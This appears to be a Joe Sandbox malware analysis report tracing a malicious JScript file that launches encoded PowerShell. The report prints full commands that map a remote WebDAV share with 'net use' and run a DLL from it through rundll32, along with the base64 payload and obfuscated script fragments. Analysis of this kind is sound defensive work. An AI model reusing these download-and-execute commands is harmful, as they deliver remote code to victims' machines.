            Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
            Data Ascii: Internal server error


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:03:19:01
            Start date:25/10/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1770711382873314149.js"
            Imagebase:0x7ff6d0e60000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:03:19:01
            Start date:25/10/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlAG4AdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAZQBuAGQAcABvAGkAbgB0AGUAeABwAGUAcgBpAG0AZQBuAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA5ADEANQA4ADkAMAA2ADIAOQAyADEAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
            Imagebase:0x7ff760310000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:03:19:02
            Start date:25/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff70f010000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:03:19:03
            Start date:25/10/2024
            Path:C:\Windows\System32\net.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\net.exe" use \\endpointexperiment.com@8888\davwwwroot\
            Imagebase:0x7ff63e8f0000
            File size:59'904 bytes
            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:03:19:05
            Start date:25/10/2024
            Path:C:\Windows\System32\rundll32.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\rundll32.exe" \\endpointexperiment.com@8888\davwwwroot\2915890629211.dll,Entry
            Imagebase:0x7ff61cf50000
            File size:71'680 bytes
            MD5 hash:EF3179D498793BF4234F708D3BE28633
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Call Graph

            • Executed
            • Not Executed
            callgraph clusterC0 clusterC2C0 E1C0 entry:C0 F3C2 Function E1C0->F3C2

            Script:

            Code
            0
            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
              1
              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                2
                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                  3
                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                    4
                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                      5
                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                        6
                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                          7
                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                            8
                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                              9
                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                10
                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                  11
                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                    12
                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                      13
                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                        14
                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                          15
                                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                            16
                                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                              17
                                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                18
                                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                  19
                                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                    20
                                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                      21
                                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                        22
                                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                          23
                                                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                            24
                                                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                              25
                                                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                26
                                                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                  27
                                                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                    28
                                                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                      29
                                                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                        30
                                                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                          31
                                                                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                            32
                                                                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                              33
                                                                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                34
                                                                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                  35
                                                                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                    36
                                                                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                      37
                                                                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                        38
                                                                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                          39
                                                                                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                            40
                                                                                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                              41
                                                                                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                42
                                                                                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                  43
                                                                                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                    44
                                                                                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                      45
                                                                                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                        46
                                                                                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                          47
                                                                                                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                            48
                                                                                                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                              49
                                                                                                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                50
                                                                                                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                  51
                                                                                                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                    52
                                                                                                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                      53
                                                                                                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                        54
                                                                                                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                          55
                                                                                                                          bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                            56
                                                                                                                            bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                              57
                                                                                                                              bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                                58
                                                                                                                                bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                                  59
                                                                                                                                  bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                                    60
                                                                                                                                    bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                                      61
                                                                                                                                      bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                                        62
                                                                                                                                        bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhruzzwmyzaubulbliz...
                                                                                                                                          63
                                                                                                                                          Function ( '' + bynduxdndruemelgjxfgrwsmpvshqgivfnypghtfktbrgsfvoaykcrgxzpjgezbbccjiddumohhidqkhr...
                                                                                                                                          • Function("return this") ➔ function anonymous()
                                                                                                                                          • () ➔
                                                                                                                                          • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                          • run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABlAG4AZABwAG8AaQBuAHQAZQB4AHAAZQByAGkAbQBlA...",0,false) ➔ 0
                                                                                                                                          Reset < >
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1390892535.00007FF8879E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8879e0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                            • Instruction ID: d8fcd4a212cba4b365201541b5d3915ac9b84ae91bfb2d856d8468da97f0a18f
                                                                                                                                            • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                            • Instruction Fuzzy Hash: C601A73111CB0D4FD744EF0CE455AA5B3E0FB85364F10052DE58AC3691DA36E882CB42
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1390892535.00007FF8879E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8879e0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8,u$P/u$p0u$-u$/u
                                                                                                                                            • API String ID: 0-2023349206
                                                                                                                                            • Opcode ID: aca48840cd02069ea5f17edd24902a8953ba5991fa30f64b0ef985a04b4e9ef5
                                                                                                                                            • Instruction ID: 95d7a705e60732d7aff6d5aff64daa169e612d212a209f023753d96423990419
                                                                                                                                            • Opcode Fuzzy Hash: aca48840cd02069ea5f17edd24902a8953ba5991fa30f64b0ef985a04b4e9ef5
                                                                                                                                            • Instruction Fuzzy Hash: 2D314D53D4E6C28EE3568A6C2C1907D6E71BF1269072900FBD0988A0DBE88D9D68C392